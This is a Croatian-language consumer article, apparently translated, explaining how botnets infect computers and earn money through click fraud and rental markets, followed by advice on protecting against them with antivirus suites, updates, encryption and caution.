Kako bi potencijalnu žrtvu natjerali da instalira bot, koriste se tehnike društvenog inženjeringa. Na primjer, nude gledanje zanimljivog videa, za koji morate preuzeti poseban kodek. Nakon preuzimanja i pokretanja takve datoteke, korisnik, naravno, neće moći gledati nijedan video i najvjerojatnije neće primijetiti nikakve promjene, a njegovo će računalo biti zaraženo i postati ponizni sluga, izvršavajući sve naredbe vlasnika botneta.

Druga široko korištena metoda zaraze botovima je drive-by-download. Kada korisnik posjeti zaraženu web stranicu, zlonamjerni se kod preuzima na njegovo računalo kroz razne „rupe“ u aplikacijama – prvenstveno u popularnim preglednicima. Za iskorištavanje slabih točaka koriste se posebne programe- podvige. Oni omogućuju ne samo preuzimanje neprimjetno, već i pokretanje virusa ili bota neprimjetno. Ova vrsta distribucije zlonamjernog softvera je najopasnija, jer ako se hakira popularni resurs, bit će zaraženi deseci tisuća korisnika!

Botu se može dodijeliti funkcija samorazmnožavanja računalne mreže... Na primjer, može se širiti zarazom svih dostupnih izvršne datoteke ili pretraživanjem i zarazom ranjivih računala na mreži.

Zaražena računala nesuđenih korisnika mogu kontrolirati kreator botneta putem naredbenog centra botneta, komunicirajući s botovima putem IRC kanala, web veze ili bilo kojeg drugog dostupnog načina. Dovoljno je spojiti nekoliko desetaka strojeva u mrežu kako bi botnet počeo stvarati prihod za svog vlasnika. Štoviše, ovaj prihod linearno ovisi o stabilnosti zombi mreže i stopi njezina rasta.

Online PPC (Pay-per-Click) reklamne tvrtke plaćaju novac za jedinstvene klikove na linkove na online oglasima. Za vlasnike botneta obmanjivanje takvih tvrtki je unosan posao. Za primjer, možemo uzeti dobro poznato google mreža Adsense. Dolazni oglašivači plaćaju Googleu klikove na postavljene oglase u nadi da će korisnik koji pogleda "u svjetlo" kupiti nešto od njih.

Google pak postavlja kontekstualne oglase na različite stranice koje sudjeluju u programu Adsense, plaćajući vlasniku stranice postotak od svakog klika. Nažalost, nisu svi vlasnici stranica pošteni. Uz zombi mrežu, haker može generirati tisuće jedinstvenih klikova dnevno - po jedan sa svakog stroja, kako ne bi izazivao previše sumnji na Google. Tako će novac potrošen na reklamnu kampanju stjecati u džep hakera. Nažalost, nikada nije bilo niti jednog slučaja da je netko odgovarao za takve postupke. Prema Click Forensicsu, 2008. godine oko 16-17% svih klikova na reklamne linkove bilo je lažno, od čega je najmanje trećina generirana botnetima. Nakon nekoliko jednostavnih izračuna, možete shvatiti da su prošle godine vlasnici botneta "kliknuli" 33 milijuna dolara. Nije loš prihod od klikova mišem!

Napadači i nepošteni poslovni ljudi ne moraju sami stvarati botnet od nule. Oni mogu kupiti ili iznajmiti botnete svih veličina i izvedbe od hakera - na primjer, kontaktiranjem specijaliziranih foruma.

Cijena gotovog botneta, kao i cijena njegovog najma, izravno ovisi o broju računala uključenih u njega. Gotovi botnetovi najpopularniji su na forumima na engleskom jeziku.

Mali botnetovi s nekoliko stotina botova koštaju između 200 i 700 dolara. Istodobno, prosječna cijena jednog bota je oko 50 centi. Veći botnet koštaju puno novca.

Zombi mreža Shadow, koju je prije nekoliko godina stvorio 19-godišnji haker iz Nizozemske, sastojala se od više od 100 tisuća računala smještenih diljem svijeta, prodana je za 25.000 eura. Za ovaj novac možete kupiti malu kuću u Španjolskoj, ali kriminalac iz Brazila odlučio je kupiti botnet.

Botnet zaštita

1. Prije svega, to su antivirusni programi i složeni paketi za zaštitu od internetskih prijetnji s redovito ažuriranim bazama podataka. Oni će pomoći ne samo da se opasnost otkrije na vrijeme, već i da je eliminira prije nego što vaš odani "željezni prijatelj" pretvoren u zombija počne slati neželjenu poštu ili "ispuštati" web-lokacije. Složeni paketi, na primjer Kaspersky sigurnost na internetu 2009, sadrže kompletan skup zaštitnih funkcija, kojima se može upravljati putem zajedničkog zapovjednog centra.

Antivirusni modul u pozadini skenira kritična područja sustava i prati sve moguće upade virusa: privitke e-pošte i potencijalno opasne web stranice.

Vatrozid nadzire komunikaciju između osobno računalo i internet. Provjerava sve pakete podataka primljenih ili poslanih tamo, te po potrebi blokira mrežne napade i sprječava tajni prijenos osobnih podataka na Internet.

Filter za neželjenu poštu štiti poštanski sandučić od prodora reklamnih poruka. Njegovi zadaci također uključuju identifikaciju phishing e-mailova, uz pomoć kojih kibernetički kriminalci pokušavaju izvući podatke od korisnika o njegovim podacima za prijavu na internetsko plaćanje ili bankovne sustave.

2. Redovito ažuriranje operacijski sustav, web preglednike i druge aplikacije čiji programeri otkrivaju i popravljaju mnoge sigurnosne rupe, kao i slabe točke koriste napadači.

3. Posebni programi za šifriranje zaštitit će vaše osobne podatke, čak i ako je bot već ušao u računalo, jer će mu za pristup morati provaliti lozinku.

4. Zdrav razum i oprez. Ako želite zaštititi svoje podatke od svih vrsta prijetnji, nemojte preuzimati i instalirati programe nepoznatog podrijetla, otvarati arhive s datotekama suprotno antivirusnim upozorenjima, ići na stranice koje preglednik označava kao opasne itd.

Zahvalni smo Kaspersky Labu na pomoći u pripremi materijala.